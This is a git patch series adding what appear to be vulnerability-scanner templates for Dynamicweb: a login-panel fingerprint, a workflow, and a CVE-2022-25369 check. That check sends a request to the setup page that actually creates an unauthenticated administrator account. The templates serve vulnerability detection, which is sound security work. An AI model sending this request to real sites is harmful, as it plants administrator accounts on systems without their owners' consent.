From e400d6f1bb4177f94ca6e3b94af48967e9a211bc Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 24 Feb 2022 13:44:58 +0530 Subject: [PATCH 1/3] Added CVE-2022-25369 --- cves/2022/CVE-2022-25369.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2022/CVE-2022-25369.yaml diff --git a/cves/2022/CVE-2022-25369.yaml b/cves/2022/CVE-2022-25369.yaml new file mode 100644 index 0000000000..ca5f5efd7f --- /dev/null +++ b/cves/2022/CVE-2022-25369.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-25369 + +info: + name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition + author: pdteam + severity: critical + reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ + metadata: + shodan-query: http.component:"Dynamicweb" + tags: cve,cve2022,dynamicweb,rce,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Success": true' + - '"Success":true' + condition: or + + - type: word + part: header + words: + - 'application/json' + - 'ASP.NET_SessionId' + condition: and + case-insensitive: true + + - type: status + status: + - 200 \ No newline at end of file From 7c8a4653e490a9da8859dac781a693eef1dd02ba Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 24 Feb 2022 13:45:13 +0530 Subject: [PATCH 2/3] Added Dynamicweb Login Panel detection --- exposed-panels/dynamicweb-panel.yaml | 35 ++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 exposed-panels/dynamicweb-panel.yaml diff --git a/exposed-panels/dynamicweb-panel.yaml b/exposed-panels/dynamicweb-panel.yaml new file mode 100644 index 0000000000..7542224ae7 --- /dev/null +++ b/exposed-panels/dynamicweb-panel.yaml @@ -0,0 +1,35 @@ +id: dynamicweb-panel + +info: + name: Dynamicweb Login Panel + author: pdteam + severity: info + reference: https://www.dynamicweb.com + metadata: + shodan-query: http.component:"Dynamicweb" + tags: panel,dynamicweb + +requests: + - raw: + - | + GET /Admin/Access/default.aspx HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + part: body + words: + - Dynamicweb + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - version ([0-9.]+) \ No newline at end of file From c086a3816e839f52e7aeb80583ce8575bb37712d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 24 Feb 2022 13:45:25 +0530 Subject: [PATCH 3/3] Added Dynamicweb workflow --- workflows/dynamicweb-workflow.yaml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 workflows/dynamicweb-workflow.yaml diff --git a/workflows/dynamicweb-workflow.yaml b/workflows/dynamicweb-workflow.yaml new file mode 100644 index 0000000000..4fe2c21b53 --- /dev/null +++ b/workflows/dynamicweb-workflow.yaml @@ -0,0 +1,11 @@ +id: dynamicweb-workflow + +info: + name: Dynamicweb Security Checks + author: pdteam + description: A simple workflow that runs all dynamicweb related nuclei templates on a given target. + +workflows: + - template: exposed-panels/dynamicweb-panel.yaml + subtemplates: + - tags: dynamicweb \ No newline at end of file